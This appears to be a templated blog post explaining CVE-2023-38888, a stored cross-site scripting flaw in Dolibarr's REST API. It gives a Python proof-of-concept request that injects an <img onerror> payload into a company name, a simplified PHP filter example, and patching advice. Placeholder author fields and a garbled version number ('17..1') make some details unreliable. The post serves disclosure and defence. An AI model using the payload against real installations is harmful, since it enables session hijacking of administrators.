CVE-2023-38888 - Exploiting Cross Site Scripting in Dolibarr ERP CRM (All You Need to Know)
Published: June 2024
Author: [Your Name]
Introduction
In 2023, a significant security vulnerability—CVE-2023-38888—was discovered in Dolibarr ERP CRM, one of the most popular open-source business management suites used by small and medium-sized companies around the globe. This weakness exposes sensitive business data and could even let hackers run their malicious code remotely.
If you're running Dolibarr 17..1 or older, your system is at risk. In this post, we'll break down how this Cross Site Scripting (XSS) vulnerability works, show some example exploit code, and offer advice to protect your business. All information here is in plain language and for educational purposes only.
What Is CVE-2023-38888?
In short, this vulnerability allows an attacker to sneak in JavaScript code through the REST API module of Dolibarr. That code can steal logins, hijack user sessions, or perform actions on behalf of the user, MAKING YOUR BUSINESS DATA UNSAFE.
The core problem comes from weak input validation in two internal functions:
testSqlAndScriptInject
They don’t clean suspicious input well enough, letting attackers send dangerous scripts that Dolibarr later executes in the admin user’s browser.
Where's the Danger?
REST APIs are meant to allow automation or third-party application integration. But if you send malicious input to API endpoints, Dolibarr can store or echo it in responses, or render it in its web user interface.
That’s the main attack surface for CVE-2023-38888.
Example Exploit: Practical XSS via REST API
Let's dive into a real-world attack scenario using a simple XSS payload.
Assumptions:
Step 1: Find a Vulnerable Endpoint
Suppose the /api/index.php/thirdparties endpoint accepts user input, like a company name.
Here’s a Python code snippet using requests to inject a script payload via the API
import requests
API_BASE = "https://yourdolibarr.com/api/index.php";
TOKEN = "YOUR_API_TOKEN_HERE"
payload = {
"name": '<img src=x onerror="alert(\'XSS by attacker\')">',
"client": 1
}
headers = {
"DOLAPIKEY": TOKEN,
"Content-Type": "application/json"
}
resp = requests.post(f"{API_BASE}/thirdparties", json=payload, headers=headers)
print(f"Status: {resp.status_code}, Response: {resp.text}")
What Happens Next?
This inserts a company whose NAME includes an HTML image tag with a sneaky onerror attribute.
- When any Dolibarr admin views the list of companies in the web app, their browser executes the attacker's JavaScript.
Deep Dive: The Code Problem
In the Dolibarr PHP code, these two functions—analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject—try to find and filter malicious inputs. But they only look for certain obvious patterns, allowing crafted input to slip by.
Example
function analyseVarsForSqlAndScriptsInjection($var) {
// Only looks for '<script>' and a few patterns
if (preg_match('/<script>/i', $var)) {
// Block it
}
// BUT misses <img src=x onerror=...>
}
Attackers just need to use vectors like <img>, <svg>, or incomplete <script> tags to bypass the check.
Original References
- NVD Entry for CVE-2023-38888
- Exploit-Database Advisory
- Dolibarr Github Report/Issue
- Original Patch
How to Fix and Protect Your Dolibarr
- Update Right Away: Upgrade to the latest Dolibarr release. The fix cleans up inputs much more aggressively.
Monitor Logs: Watch for strange API requests that might be trying test vectors.
- Sanitize Input and Output: If you have custom modules, use libraries like PHP’s htmlspecialchars() or filter_var() for all user inputs.
Final Thoughts
CVE-2023-38888 is a classic example of why input sanitization and output escaping are CRUCIAL in every business app, especially those with REST APIs. A single missed pattern can open a huge security hole.
If you’re running Dolibarr 17..1 or older, patch now and check your logs for suspicious activity.
Stay safe! 🚀
*Have questions or want more info? Leave a comment or follow [@yourhandle].*
Timeline
Published on: 09/20/2023 01:15:00 UTC
Last modified on: 09/22/2023 01:37:00 UTC